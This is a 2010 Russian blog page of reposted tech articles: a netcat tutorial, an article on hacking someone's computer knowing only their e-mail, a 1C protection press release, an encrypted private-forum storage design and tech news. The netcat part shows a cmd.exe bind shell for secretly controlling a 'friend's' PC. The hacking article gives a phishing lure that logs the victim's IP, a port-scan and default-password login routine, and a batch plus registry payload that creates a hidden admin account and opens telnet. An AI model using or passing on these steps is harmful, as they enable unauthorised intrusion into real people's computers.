-Видео

 -неизвестно

 -неизвестно

 -Поиск по дневнику

Поиск сообщений в Steem777

 -Подписка по e-mail

 

 -Сообщества

Читатель сообществ (Всего в списке: 1) MY_HIT

 -Статистика

Статистика LiveInternet.ru: показано количество хитов и посетителей
Создан: 08.06.2010
Записей:
Комментариев:
Написано: 217




Блогун - монетизируем блоги


NetCat лучший друг хакера или вся правда о пирочиных ножах

Четверг, 19 Августа 2010 г. 12:33 + в цитатник


NetCat одна из самых известных утилит для тестирования сетевых приложений. Поэтому я не мог пропустить эту чудесную тулзу из виду и не написать статью про самый лучший, на мой взгляд, инструмент для тестирования сетевых приложений.
Начнем пожалуй с того что с помощью nc можно тестировать все протоколы прикладного уровня модели OSI.(для тех кто не знает что это http://ru.wikipedia.org/wiki/Сетевая_модель_OSI). Да это не так уж и много и даже обидно что такая утилита не может на прямую работать с протоколами нижний уровней на подобие TCP или IP.
Но, увы, всего и сразу не бывает и может быть, если у меня будет настроения, я напишу, как работать с библиотекой pcap и вы сами сможете создать чудесное приложение для работы со стеком протоколов TCP/IP.
И так приступим к изучению NetCat с моей самой любимой команды help.
Набрав нашем обожаемом cmd строчку такого вида:
nc –h вы увидите хелп.(это для тех кто вообще ничего не понимает было написано:-))
C:>nc -h
Первое что сразу же должно бросится нам в глаза это синтаксис ввода команд:
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [options] [hostname] [port]
Разберем же его более подробно.
В первой строчке написан синтаксис для тестирования серверных приложений после непосредственного ввода команды nc мы должны указать опции которые будут рассмотрены ниже, далее нужный нам хост и порт(ы).
Во второй строчке написан синтаксис для тестирования клиентских приложений опция –l обозначает включение режима прослушки определенного порта который мы указываем после опции –p, далее идут дополнительные опции имя хоста и порт соединение с которыми мы ожидаем.
На сколько вы уже могли догадаться то что указано в квадратных скобках является необязательными параметрами. А это значит что netcat можно запустить в таком виде:
C:>nc 127.0.0.1 80
И соединится с 80 портом у нас на localhost. NetCat будет терпеливо и послушно ждать данных, которые мы хотим отправить на указанный порт данного сервера, а при нажатие на enter отправит их и так же терпеливо будет ждать ответ от сервера.
Ну например если ввести в cmd:
C:>nc google.ru 80 [CR][LF] (даже не думайте вводить www.google.ru это вам не браузер)
То NetCat соединится с 80 портом сервера google.ru и будет ждать ввода данных, которые мы хотим оправить. Введем туда запрос главной страницы www.google.ru (для тех кто не знаком с протоколом HTTP http://ru.wikipedia.org/wiki/HTTP)
GET / HTTP/1.0[CR][LF] [CR][LF](два раза нужно нажать enter)
Для особо непонятливых [CR][LF] это нажатие на кнопку enter:-)(ну не совсем, вообще то это признак конца строки).
И о чудо мы видим, что к нам пришел html код главной страницы www.google.ru.
Команду nc –l –p port мы рассмотрим подробней, так как она представляет большой интерес.
Написав в cmd:
C:>nc –l –p 12345
Мы запускаем у себя на компьютере небольшой сервер, который прослушивает порт 12345.
Таким образом, мы можем даже переписываться с друзьями вот таким вот не хитрым образом:
C:>nc –l –p 12345
Этой командой мы запустим у себя сервер.
C:>nc ваш_ip 12345
А этой командой пусть воспользуется ваш друг. И можете общается как True HaCKeRs.
Или можно сделать все на localhost и переписываться самому с собой (ну мало ли друзей нет в жизни одиноко).
Надеюсь, основы вы поняли! Но мы же люди с непостижимой тягой к знаниям, так что будем углубляется.
Опция –e указывает на то какое приложение мы хотели бы запустить при коннекте к нашему серверу.
C:>nc –l –p 12345 –e C:windowssystem32cmd.exe
Самое интересное в данной опции то, что весь ввод будет идти указанному приложению. А это значит что если мы запустим у «друга» команду указанную выше мы активируем удаленный шел и придя домой сможем свободно бродить у «друга в гостях»(если знаете основы работы с DOS).
Подключившись к нему таким вот образом:
C:>nc ip_жертвы 12345
Наверное, у некоторых встал вопрос, а может ли NetCat работать по UDP протоколу, вить все рассмотренное выше относится к TCP.Ответ однозначный и четкий да может! Для этого предназначена опция –u которую просто нужно подставить:
nc –l –p 12345 –u (прослушивает 12345 UDP порт)
nc –u 127.0.0.1 12345 (подключается к 12345 UDP порту)
и вуаля мы уже работаем по UDP протоколу, что не может меня не радовать, так как люди часто забывают про него и его преимущества, хотя и недостатков у него хватает, но эта тема отдельной статьи.
Опция –w указывает на количество времени, которое NetCat будет ждать ответа от сервера. Ну скажем если мы подключимся к серверу, а он нам не отвечает по каким либо причинам то приложение нужно будет заканчивать аварийно нажатием Ctrl+C, но опция –w лишает нас этого недостатка и устанавливает время ожидания по окончанию которого связь с сервером будет прервана!
Опция –o делает возможным сохранить в лог файл хекс дамп вашего соединения. Что бывает очень полезно при длительных анализах сетевых приложений, дабы вернутся и посмотреть, если что то неожиданно забыли :-) или просто нужно сохранить историю соединения в файл для дальнейшего анализа.
Допустим команда:
C:>nc –o C:hexdump.txt pop.mail.ru 110
USER testuser[CR][LF]
PASS passuser[CR][LF]
RETR 1[CR][LF]
QUIT[CR][LF]
соединится с POP3 сервером mail.ru получит первое сообщение и выйдет сохранив историю соединения и сообщение в файл C:hexdump.txt. (подробней о работе с POP3 протоколом с подошью nc читайте мою статью «POP3 протокол или как работать с почтой при помощи пирочиного ножа»).
Опцию –v я просто обожаю! Она выводит экран подробную информацию о соединение что несет громадную пользу при исследование! Впрочем, сами все увидите.
C:>nc –v google.ru 80
Само собой разумеется, что эта чудесная опция тоже будет работать так:
C:>nс –l –p 12345 –v
И расскажет вам кто и зачем к вам подключился!
Опция –z очень помогает тогда когда вы знаете что такое циклы и как они работают.
При включение этой опции NetCat просто соединяется с указанным вами хостом и портом и и при включенной опции –v воозврашает ответ что хост доступен, а порт открыт(или недоступен и закрыт) при этом разумеется он не ждет от вас ввода данных для отправки, а сразу закрывает соединение.
C:>nс –v –z google.ru 80
DNS fwd/rev mismatch: google.ru != gv-in-f104.1e100.net
DNS fwd/rev mismatch: google.ru != ew-in-f104.1e100.net
DNS fwd/rev mismatch: google.ru != ww-in-f104.1e100.net
google.ru [216.239.59.104] 80 (http) open
Но постойте! А что если порт не открыт или еще хуже хост недоступен? Что тогда? Вечно ждать ответа? Или по-быстрому создать сервер, что бы он ответил на заданный вопрос? Нет, просто задать уже знакомый нам ключик –w.
А если данные будут отправляется слишком быстро? И сервер подумает что мы проводим ddos атаку? Но и тут коварный и ужасный NetCat придумал для нас опцию –i, с помощью которой мы задаем число секунд, через которое NetCat должен посылать следующий запрос.
Опция –n отключает DNS(и/или файл hosts) и поиск номеров портов в файле services.
(для ОС Windows C:WindowsSystem32driversetcservices
для *nic подобных ОС /etc/services)
Иногда это бывает полезным. Допустим, если некая программа изменила значение порта и его символьного представления.
Кажется, я забыл упомянуть о том, что номера портов не обязательно указывать как 80, можно указать как www. Номера портов и их символьное представление можно посмотреть в выше указанных файлах.
И наконец опция –s задает ip адрес с которого мы бы хотели подключиться или на котором мы бы хотели ожидать подключения к нам. Это тоже бывает полезно в тех случаях, когда у вас два разных ip адреса, и вы бы хотели ждать подключения или же подключатся с указанного вами ip(при наличии пары сетевых платы или локальной сети где есть localhost,LANip,WANip это актуально). Надо всего-то указать ваш адрес:
C:>nс –v –s my_ip_addr google.ru 80
Подключится к google.ru с адреса my_ip_addr.
Я попытался рассмотреть наиболее общие опции для различных версия NetCat. Опцию –t я подробно рассмотрел в моей статье «telnet ….».
В заключение могу сказать что возможности NetCat не ограничиваются рамками этой статьи более того могу сказать его возможности в *nix подобных ОС почти не ограничены и с уверенным знанием протоколов и языка Shell, вы сможете написать очень мощные сетевые приложения. Кстати в поставку NetCat входят скрипы, показывающие его серьезные возможности! Не надо думать что NetCat не применим в ОС Windows, он также может там использоваться, просто возможности консоли данной ОС не так велики что не удивительно вить в Windows упор сделан на удобство, а значит графический интерфейс в данном случае не так уж и важней.

Взлом компа, зная только мейл

Четверг, 19 Августа 2010 г. 12:33 + в цитатник
Доброго времени суток.

Я уезжал на подкурсы, но вот, вернулся на 2 дня (субботу и воскресенье) и решил написать статейку.

Статья о том, как получить полный доступ к чужому компьютеру, зная только e-mail.
====================================================
Содержание:

1.) Предисловие
2.) Узнаем IP
3.) Пользуемся разными прогами (анализ полученных данных)
4.) Если анализ ничего не дал?
5.) Краткая теория
6.) Послесловие

====================================================
1.) Предисловие.

Для того чтобы пользоваться этим методом, надо определиться, нужно ли это Вам в реальности, или Вам хочется просто развлечь себя и доказать, что Вы - лучший(ая). Последнее было для меня стимулом для того чтобы все это проделывать, но теперь я многое понял, а главное - понял то, что взлом не должен проводится чтобы доказать окружающим тебя людям, что ты "кулхацкер". Каким я себя не считаю. Многому надо научиться, и после практики, если все получилось, на мой взгляд, не надо от нечего делать взламывать чужие компьютеры. Итак, надеюсь с целью все определились, перейдем к действию?

====================================================
2.) Узнаем IP.

Надеюсь ни для кого не секрет, что без IP, мы не сможем найти нужный нам компьютер, и следовательно - провести взлом. Так как же его узнать? (многие задаются этим вопросом и часто пишут мне на аську). Очень просто, нам потребуеются прямые руки, немного фантазии и онлайн сниффер.
Многие используют сниффер для увода cookies (куков, печенек, сессии - кому как нравится). Но в нашем случае, cookies нас не интересуют. Мы идем сюда и регистрируемся, если раньше этого не делали.

http://hacker-pro.net/sniffer/

Отлично. Пол дела сделанно. Теперь идем в "настройки", при необходимости загружаем свое изображение. И нам дается ссылка на сниффер, с редиректом (перенаправлением) на нашу картинку. Не забудьте поставить галочку на "записывать IP в лог". Надеюсь поняли о чем я? Нет?! Тогда читайте.
Смысл в том, чтобы дать эту ссылку своей "жертве", но только со ссылкой cпрятанной в слове (изучаем html), а если в лом, то просто берете:

Здесь пишите любой текст, или одно слово

Пишите какой-нибудь текст (включайте фантазию). Возьмеме самое простое:

===========
Здравствуйте! На Ваш E-mail адрес была отправленна открытка, чтобы посмотреть ее, нажмите сюда
===========

Это было самое легкое, советую придумать что-то более оригинальней. Всю эту муть отправляете жертве. При желании можно использовать сервисы анонимной отправки почты, или залить php скрипт, и самому сделать такой сервис. Можете использовать мой, но я могу его в любой момент отключить:

http://mqil.su/message/

Все, осталось жертве ПЕРЕЙТИ "посмотреть картинку", как IP палится в логе.
Не надо ничего никуда вводить, как в случае с фейком. В итоге все довольны, он (она), получила свою открытку, а Вы IP.

====================================================
3.) Пользуемся разными прогами (анализ полученных данных)

Теперь, у нас есть главное, без чего была бы невозможна дальнейшая работа. Дальнейшие действия - проверить хост (компьютер) на наличие уязвимостей - открытых портов. Я для этих целей пользуюсь сканером [XSpider 7.5], Вы можете использовать любой другой, на Ваш вкус. Но лучше всего использовать несколько сканеров, что не покажет один - покажет другой.

Сразу качаем себе [XSpider 7.5] отсюда - http://depositfiles.com/files/tcdbrurxj
Обновлять не рекомендую, так как версия крякнутая, и полностью рабочая.

Теперь когда Вы скачали его, необходимо его настроить - создать новый профиль. Кто-то на сайте описывал настройку профиля, но чтобы Вам не приходилось искать статью, я Вам опишу настройку.

Открываете сканер
>>>Профиль
>>>Новый...
>>>Комментарий (пишите что хотите)
>>>Идете на вкладку "Сканер Портов", и внизу рядом с надписью "default.prt" давите [...]
>>>Выйдет окошко, давите "новый"
>>>Пустой
>>>В комментах пишите что угодно
>>>внизу увидеть "добавить порты" и пишите "4899" и "3389"
>>>Сохранить как "4899".
>>>Дольше выходите обратно на вкладки, и снимаете отовсюду галки.

Точно также создаете еще 1 профиль, только порт 23. Все.

Теперь вбиваете IP своей жертвы, в поле "добавить хост" и начинаете сканировать. Если вдруг открытым оказался один из портов 4899 - Radmin, 23 - telnet, 3389 - Remote Desktop (удаленный рабочий стол) - пробуете законнектиться (подключиться). Пароль по дефолту 12345678, об этом уже писалось. Самое лучшее (для меня), когда открыт 4899 порт (Radmin). Подключились? Радуйтсь!
Дальше можете делать все что Вашей душе угодно. Дальше читать не обязательно.

но чтобы не палиться, рекомендую Вам убрать иконку в трее (рядом с часиками), и создать нового пользователя, с правами администратора. (об этом между прочим тоже писалось раньше) - не буду писать, а то статья очень большая получится.

Remote Desktop входит в стандартную комплектацию Windows.
RAdmin Viewer можете скачать тут - http://depositfiles.com/files/92m5usz2b
В нем же есть и telnet
P>S
RAdmin тоже входит в стандартную комплектацию.

Если не получилось подключиться, не отчаиваемся, читаем дальше.

=====================================================
4.) Если анализ ничего не дал?

Если он ничего не дал, то можно своими усилиями помочь себе. Делается это просто, серверная часть устанавливается на удаленный компьютер/открывается нужный порт с нужным логином и паролем. Конечно, но как установить/открыть, если компьютер далеко???

- А для чего интернет?? WWW - World Wide Web - ВСЕМИРНАЯ паутина.
Через интернет тоже можно установить программу на чужой компьютер/или открыть доступ к уже существующему.
Radmin если что, тоже идет в стандартной комплектации Windows. А установить, что это действительно Windows, можно тем же сканером. Значит - нам остается только открыть доступ к этому сервису (23). Об этом до нас тоже позаботились, и написали вот такой *.txt файл, который в последствии переименовывается в *.bat.
Затем создается еще один файл, файл конфигурации реестра, который скрывает нового пользователя с глаз, и его не видно в окне приветствия.

содержимое *.bat файла
++++
chcp 1251
net user SUPPORT_388945a0 /delete
net user restot 12345678 /add
net localgroup Администраторы restot /add
net localgroup Пользователи SUPPORT_388945a0 /del
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
++++

Этим файлом Вы создаете нового пользователя с именем restot и паролем 12345678
импортируете в реестр настройки, которые скроют Ваше имя в окне приветствия.
открываете 972 порт, и активируете телнет через него.

Записывается без плюсиков в блокнот, потом меняется расширение на *.bat

теперь содержимое файла conf.reg
++++
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows
NTCurrentVersionWinlogonSpecialAccountsUserLis t]
"restot"=dword:00000000
++++

В последней строке, в кавычках, пишите имя, которое указали в *.bat файле.
также записываете в блокнот, а потом меняете расширение на *.reg

сохраняете все это в одной папке, можно просто заархивировать оба файла в один архив, а можно поступить умнее, скомпилировать файл *.bat в файл *.exe, и также добавить в архив поменяв иконку, об этом читайте в статьях на портале. После того как жертва запустит батник, можно будет коннектиться к 972 порту, или к любому другому, главное чтобы не был занят...

затем можно установить то что нужно через службу Telnet, и более комфортно управлять удаленной машиной.
==========================================================
5.) Краткая теориия|||
==================

находите жертву >>> узнаете ip >>> проверяете на наличие открытых портов >>> открываете порты (если открытых не было) >>> устанавливаете через telnet то что нужно для удобство >>> осуществляете свой злобный план..
==========================================================
6.) Послесловие|||
==================
Статья писалась пару месяцев назад, я наисал начало, и сохранил в блокноте, сейчас увидел, решил дописать и выложить Концовка не полная, но статья ориентированна для немного понимающих юзеров, поэтому разберетесь.
Статья не является каким-то уникальным способом взломать чужой компьютер, даже не знаю,зачем я ее выложил. но тем не менее, если она прошла модерацию, и вы ее сейчас читаете, то знайте, что писалось чтобы помочь вам, читателям.

Конструктивная критика принимается, рад услышать мнение людей.
Всем спс за внимание, до новых встреч.


Компании «Интелис» и Aladdin объявляют о выходе новой версии совместного решения

Четверг, 19 Августа 2010 г. 12:32 + в цитатник

Москва, 7 апреля 2010 г. – Ведущий российский разработчик и поставщик средств аутентификации, продуктов и решений по информационной безопасности компания Aladdin и интегратор и разработчик решений для платформы «1С: Предприятие 8» компания «Интелис автоматизация» объявляют о выходе новой версии продукта «ИНТЕЛИС: Защита конфигураций 2.0» для защиты прикладных решений, разработанных на платформе "1С:Предприятие 8.2".
Главное преимущество нового продукта - простота и гибкость использования. Вся защита устанавливается в течение 5 минут разработчиком 1С конфигураций. Продукт полностью соответствует идеологии 1С, позволяя установить защиту и лицензионные ограничения только на самые важные части конфигурации, оставляя всю остальную конфигурацию полностью открытой для пользователя. Фактически процесс установки защиты сводится к указанию, какие именно модули конфигурации надо защитить и при вызове каких функций необходимо проверять наличие ключа защиты.
Продукт использует инновационную методику защиты модулей конфигурации от анализа и изменения. До настоящего момента 1С конфигурации защищались в основном либо штатными средствами и поставлялись в скомпилированном виде, либо вынесением кода во внешние обработки, либо созданием внешних библиотек DLL на других языках программирования. Все эти методы имели крайне низкую степень защиты, или же подразумевали для разработчика необходимость владения другим языком программирования (в случае создания внешней DLL). «ИНТЕЛИС: Защита Конфигураций 2.0» (ИЗК 2.0) позволяет защитить конфигурацию на платформе 1С Предприятие 8.2 путем обфускации байт-кода модулей конфигурации и шифрования данных.
Использование такого механизма позволяет разработчику установить защиту как на отдельные модули внутри конфигурации 1С, так и на отдельные внешние обработки и отчеты. У разработчиков нет необходимости выделять защищаемый функционал в отдельные обработки. Кроме того, разработчики могут осуществлять лицензирование использования конфигурации при любом варианте запуска: «толстый» клиент (в т.ч. в терминальном режиме), «тонкий» клиент, web клиент. При использовании ИЗК 2.0 защита конфигурации происходит практически в автоматическом режиме. Разработчику требуется лишь указать, что именно следует защитить и обеспечить наличие компоненты защиты.

Новый продукт будет распространяться как отдельное решение, так и в составе бандла – Стартового комплекта HASP SRM для защиты 1С конфигурации, который содержит все необходимое для построения защиты 1С конфигурации: ИЗК 2.0, пять ключей HASP HL, служебные ключ Master Key, необходимый для построения защиты. Кроме того, в состав бандла включаются 50 программных лицензий HASP SL (25 локальных и 25 сетевых), и 90-дневная лицензия на сервер активаций (HASP SRM Business Studio Server). Это означает, что в течение 3 месяцев со дня инсталляции программного обеспечения HASP SRM, разработчик может выделить до 50 программных лицензий на свой защищенный продукт.

Комментирует руководитель направления защиты ПО компании Aladdin Александр Гурин: «защита – это всегда некий компромисс между удобством и надежностью. Я искренне рад, что нашим партнерам из компании «Интелис» удалось найти эту грань: внедрение действительно стойкой защиты не отнимает колоссальное количество времени, а органично вписывается в процесс создания и лицензирования 1С конфигурации».






Проектируем хранилище для приватки

Четверг, 19 Августа 2010 г. 12:31 + в цитатник
Эта статья - часть технической документации проекта PrivX. На сам проект мы давно положили болт, но изначально у нас была договоренность на этот случай - в случае провала описать наработки и идеи, которые у нас появятся в процессе, на тот день, когда кто-нибудь, с более высокой мотивацией, решит создать аналогичный проект.

///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
При проектировании любой приватки нужно решить две задачи:

1. Безопасный обмен данными; левые лица не должны узнать об содержимом передаваемых данных никаким способом. Эту задачу успешно решает криптография. Как пример, SSL или PGP.

2. Безопасное хранилище; левые лица не должны узнать о содержимом хранилища ни при каких обстоятельствах. Вот об этом мы и поговорим в данной статье.
Для успешного восприятия материала, вы должны быть знакомы с RSA хотя-бы базово на пользовательском уровне (фактически, знания о назначении каждого типа ключа, закрытого и открытого, будет достаточно).

Сначала рассмотрим пример - обычный закрытый форум, на распространенном движке типа vB, IPB, phpBB.
Если настроить HTTPS, то, в принципе, первый пункт успешно решается.


Но хранилище форума, в виде БД, имеет ряд недостатков:

* Централизованность относительно местоположения. Если на сервере произойдет авария, или его арестуют, приватка будет недоступна.

* Данные хранятся в незашифрованном виде. При взломе либо аресте сервера, данные могут быть извлечены из БД и прочитаны. Конечно можно сделать БД, хранимую только в памяти, но тогда при вынужденном ребуте либо перебое питания все содержимое базы пропадет.

* Бэкапы базы нельзя хранить на непроверенных источниках. А проверенные, как легко догадаться, это жесткие диски самих участников. Что, конечно же, тоже небезопасно при аресте одного из участников.

Система организации хранилища, описываемая в этой статье, лишена трех вышеперечисленных недостатков, поскольку использует в своей работе криптографию.

Физически данные могут храниться в произвольном хранилище, даже на honeypot'е, хотя это и не рекомендуется. Итак, все пространство для данных разделяется на логические элементы - кластеры, в которых могут размещаться порции шифрованных данных, по аналогии с кластерами файловой системы на жестком диске. Естественно, раз имеет место разделение, необходимо также уметь и объединять части кластеров. Для этого нужно хранить базу индексов конкретных "виртуальных файлов".

Группой доступа G будем называть объединение n пользователей {U1,U2,...,Un}. Основное предназначение группы доступа - контролировать доступ к данным для каждого пользователя. У каждой группы есть один или несколько координаторов. Задача координаторов - производить оперативную перегенерацию и обмен ключами. Каждая группа доступа имеет одну пару ключей RSA; наличие у члена группы закрытого ключа позволяет читать и (потенциально) писать данные.

Наличие только открытого ключа не позволяет читать существующие данные, но позволяет записывать их в хранилище (сомнительная фича).

Возможно открытый ключ группы можно выкладывать публично, с целью запросить инвайт в группу, или же оставить участникам свое резюме.

Выкладывать закрытый ключ нельзя; во-первых, каждый кто его имеет, может прочитать зашифрованные данные, во-вторых, из закрытого ключа (n,d) гораздо легче получить открытый (n,e), поскольку модуль n - общий для обоих ключей, а открытая экспонента e как правило берется равной одному из чисел, расположенных в начале последовательности чисел Ферма. Значит, станет возможным не только читать, но и получить возможность модифицировать данные.



Теперь сформируем требования к формату собственно зашифрованного пакета, хранимого на произвольных дисковых площадках.

Обязательные поля, которые должны быть предусмотрены в пакете:

*** Штамп времени формирования пакета. Необходим при синхронизации пакетов, а также для хронологии. Можно вполне использовать и UNIX timestamp. Основное требование к штампу - возможность восстановить из него дату/время хотя бы с отметкой. Поэтому хэши не подходят (это на случай если вы задумали взять sha-1 хэш от текущей даты и времени).

*** Непосредственно сами данные, в незашифрованном виде.
Хэш от незашифрованных данных. Нужен для проверки целостности сообщения после дешифровки пакета. Лучше не удалять это поле из спецификации, закон Мерфи и баги в реализациях RSA иногда дают о себе знать :)

*** Уникальный идент автора и подпись данных его личным закрытым ключом. Это позволит определять автора сообщения, поста и т.д. Обратите внимание, что эта информация станет доступной только после дешифровки пакета.

*** Соль для подписи автора. Её необходимо добавить к незашифрованному сообщению перед проверкой подписи. Необходима для защиты от атаки на подпись RSA в схеме с нотариусом. (Всякое бывает, лучше и предусмотреть).

*** Энтропия. Это набор криптографически случайных данных. Обязательно использовать, когда шифруешь по RSA. Иначе злоумышленник может предположить содержимое пакета, и доказать свое предположение, имея ваш открытый ключ (который, как известно, публикуется). А то и вовсе восстановить ваш закрытый...


Сам же пакет хранится на сервере вместе с его хэшем. Настоятельно не рекомендую дырявые алгоритмы вроде MD5. Используйте лучше MD6 или SHA-1, и следите за новостями в мире криптографии; главное - не пропустите появление квантовых компьютеров, потому что с их появлением алгоритм шифрования RSA станет легко вскрываем разложением числа n на множители и последующим восстановлением пары криптографических ключей. И все это недели, дни и часы, а не миллионы лет. Но думаю это еще не скоро будет.


Рассмотрим теперь две операции, которые можно производить с группой доступа.

***Расширение доступа. Это предоставление новому участнику прав читать и писать в группу. Математически это преобразование {U1, U2, ..., Un} в {U1,U2, ..., Un, K}, где K - новый пользователь. На практике это означает сообщение ему пары ключей RSA, используемых группой.

***Сужение доступа. Если нужно лишить какого-нибудь участника прав на группу, необходимо сгенерировать новую пару ключей, перешифровать новым открытым ключом все данные, и сообщить новую пару ключей всем участникам, кроме исключаемого (одного или нескольких).

Пожалуй, на этом все.
///////////////////////////////////////////////////////////////////////////////////////////////////
В более красивом оформлении можно прочитать здесь:
http://hryas.blogspot.com/2010/08/privx_14.html

Опубликованы первые неофициальные детали о Windows 8

Четверг, 19 Августа 2010 г. 12:31 + в цитатник
Microsoft пока официально ничего не сообщает о будущей версии операционной системы Windows 8, однако независимые сайты, освещающие деятельность корпорации, вчера опубликовали первые детали о будущей версии настольной операционной системы Microsoft. В корпорации Microsoft подлинность данных сведений не подтверждают, но и не отрицают.

Веб-сайт Microsoft Journal накануне опубликовал несколько документов, промаркированных как Microsoft Confidential, и связанных с будущей флагманской системой корпорации. Авторы сайта утверждают, что документы были ими получены от надежных источников внутри Microsoft. Одними из ключевых возможностей новой системы должны стать функции по распознаванию лиц пользователей, новые методы аутентификации, а также измененный механизм загрузки ОС, который позволит грузиться ей быстрее.

Также в документах говорится, что будущая версия системы, называемая для условности Windows 8, получит поддержку 3D-мониторов, беспроводного соединения с мониторами и телевизорами, а также поддержку таких интерфейсов, как USB 3.0 и Bluetooth 3.0. Еще одной возможностью, которую наверняка оценят обладатели Windows-ноутбуков, станет поддержка динамической яркости, позволяющая в режиме реального времени менять освещение дисплея ноутбука в зависимости от объема света, падающего на него. Также система должна получить более "прозрачный" интерфейс.

Стоит отметить, что многие из заявленных возможностей не то что похожи на функционал Mac OS X, а буквально напрямую копируют его. Напомним, что в подражании Mac OS X в свое время обвиняли еще Windows 7, но в Microsoft сделали вид, что ничего не слышали о данной критике.

Среди действительно новых функций можно выделить возможность "сброса" ПК до начальных настроек с сохранением пользовательских файлов. Этот функционал может пригодиться, когда пользователь изменил массу настроек и система стала работать нетипично, а возвращать все в ручном варианте слишком долго.

Также в представленных документах говорится, что пока Windows 8 находится в состоянии приближенном к M1. Так называемые M-состояния - это внутренняя маркировка Microsoft, говорящая о том, что ОС не готова даже для внутреннего тестирования и фактически пока существует "в разобранном состоянии". После M1, следуют состояния M2 и M3 и лишь потом компания выпускает лимитированную бета-версию. Также состояние M1 означает, что компания пока лишь планирует многие из функций Windows 8.

Сайты также отмечают, что Microsoft уже сейчас работает с производителями ПК над адаптацией разрабатываемой ОС под будущее поколение оборудования. Известно, что как минимум один раунд консультаций с производителями компьютеров уже состоялся. Кроме того, источники в Microsoft говорят, что корпорация намерена проводить регулярные закрытые форумы, где будут обсуждаться те или иные особенности системы с производителями оборудования.

Тем временем в Microsoft на днях сообщили, что операционная система Windows 7 пока полностью оправдывает свое название самой продаваемой операционной системы в мире. В пятницу корпорация сообщила, что продажи Windows 7 превысили отметку в 150 млн копий или 7 продаваемых копий каждую секунду. В официальном блоге Windows менеджер по коммуникациям Microsoft Мэтт Ле Бланк сообщил о том, что Windows 7 вступила в новую стадию своего развития. По его словам, 75% предприятий в мире или уже используют Windows 7 или же тестируют данную ОС для предстоящего развертывания в производстве.

Также в корпорации говорят, что с момента релиза данной ОС продажи Windows 7 лишь растут. Данная ОС была выпущена в октябре 2009 года и за первые полгода с момента ее выпуска, объем продаж дистрибутивов Windows 7 составил 100 млн штук.

В корпорации говорят, Windows 7 пока не слишком распространена в корпоративном секторе и причин тому две: во-первых, обновление операционных систем здесь связано с закупкой нового оборудования, то есть предприятия в большинстве случаев привязаны к аппаратному обновлению, а во-вторых, во многих компаниях предпочитают устанавливать операционные системы только после того, как для них выходит первый набор исправлений Service Pack1. Для Windows 7 такой пакет ожидается в самом конце года.

Создатель Chrome OS ушел из Google в Facebook

Четверг, 19 Августа 2010 г. 12:30 + в цитатник
Мэттью Папакипос, главный создатель и разработчик операционной системы Chrome OS в составе Google, уходит из этой компании, чтобы занять важный пост в социальной сети Facebook.
В будущих версиях Chrome появится функция блокирования устаревших подключаемых модулей (плагинов). Согласно сообщению, опубликованному в веб-блоге разработчиков проекта Chromium, реализация этой функции запланирована на среднесрочную перспективу. Последнее время Google...
Браузер Chrome будет блокировать устаревшие плагины

Компания HP представила первый фотопринтер со сканером HP Photosmart, входящий в линейку веб-ориентированных печатающих устройств. Речь идет об устройстве HP Photosmart e-All-in-One D110a, которое поддерживает функцию ePrint, что позволяет отправлять...
HP начала продажи первого веб-принтера

Мэттью Папакипос (Matthew Papakipos), технический директор проекта Chrome OS в компании Google, который считается главным создателем этой операционной системы, покидает свой пост в Google и переходит работать в социальную сеть Facebook.

Об этом сообщил сам Мэттью Папакипос в своем блоге на платформе микроблогов Twitter. Папакипос создал ОС Chrome и руководил ее разработкой в компании. Также он был директором проекта HTML5 для Chrome OS и управлял созданием графического процессора (GPU) Chrome.

Мэттью Папакипос начал работать в интернет-гиганте в 2007 г., когда Google приобрела компанию PeakStream, занимавшуюся разработкой программного обеспечения. В PeakStream он занимал посты технического директора и вице-президента по разработке ПО.

Как отмечают аналитики, это серьезная потеря для компании Google, которая планирует выпустить свою ОС уже этой осенью, и, в свою очередь, большое приобретение для команды Facebook.

Представители социальной сети официально подтвердили назначение Папакипоса, но отказались сообщить, над чем он будет работать в компании, отметив лишь, что бывший глава проекта Chrome OS займет важную должность в команде разработчиков, сообщает TechCrunch. «Мэтью является состоявшимся предпринимателем и инженером, и мы очень рады, что он решил предоставить свои огромные таланты Facebook», - сказано в заявлении социальной сети.

Представители Facebook также сообщили о назначении Джоселин Голдфайн (Jocelyn Goldfein), которая ранее работала главой подразделения настольных продуктов компании VMware.


Мэттью Папакипос, которого считают главным создателем Google Chrome OS, переходит работать в Facebook

Кто заменит Мэттью Папакипоса на посту директора по разработке Chrome OS, представители Google пока не сообщали.

Операционная система Google Chrome OS была анонсирована в августе 2009 г. Она представляет собой легковесную платформу, основанную на веб-браузере Google Chrome, который служит средой для запуска веб-приложений. Chrome OS также будет оснащена медиаплеером, который позволит превратить компьютер в развлекательный центр, и возможностью оффлайнового доступа к Gmail.

Одним из преимуществ новой операционной системы, по словам представителей интернет-гиганта, является то, что под нее не нужно будет разрабатывать приложения заново. Еще одной особенностью является короткий промежуток времени между нажатием на кнопку питания компьютера и его готовностью к работе. В Google обещают, что время включения системы составит несколько секунд. В компании не исключают, что со временем Chrome OS будет устанавливаться на неттопы и другие устройства. Ранее сообщалось о том, что первые персональные компьютеры на базе операционной системы Chrome OS появятся в продаже «поздней осенью».

Вышел комплексный апдейт для пакетов Adobe Reader и Acrobat

Четверг, 19 Августа 2010 г. 12:30 + в цитатник
Компания Adobe Systems выпустила комплексный набор «заплаток» для пакетов Reader и Acrobat. Как сообщается, в общей сложности устранено почти два десятка уязвимостей. Многие из «дыр» теоретически могут использоваться злоумышленниками с целью захвата контроля над удалённым компьютером и выполнения на нём произвольного вредоносного кода. Часть найденных ошибок связана с повреждением данных в памяти; некоторые уязвимости позволяют проводить DoS-атаки. Отмечается, что по крайней мере одна из «дыр» уже эксплуатируется злоумышленниками. Проблемы затрагивают пакеты Adobe Reader 9.3.2 (и ранние версии) для операционных систем Windows, Mac OS X и UNIX, Adobe Acrobat 9.3.2 (и ранние версии) для Windows и Mac OS X, Adobe Reader 8.2.2 (и ранние версии) и Adobe Acrobat 8.2.2 (и ранние версии) для Windows и Mac OS X. Adobe настоятельно рекомендует загрузить обновления для указанных продуктов.

Выпущен жесткий диск объемом три терабайта

Четверг, 19 Августа 2010 г. 12:29 + в цитатник
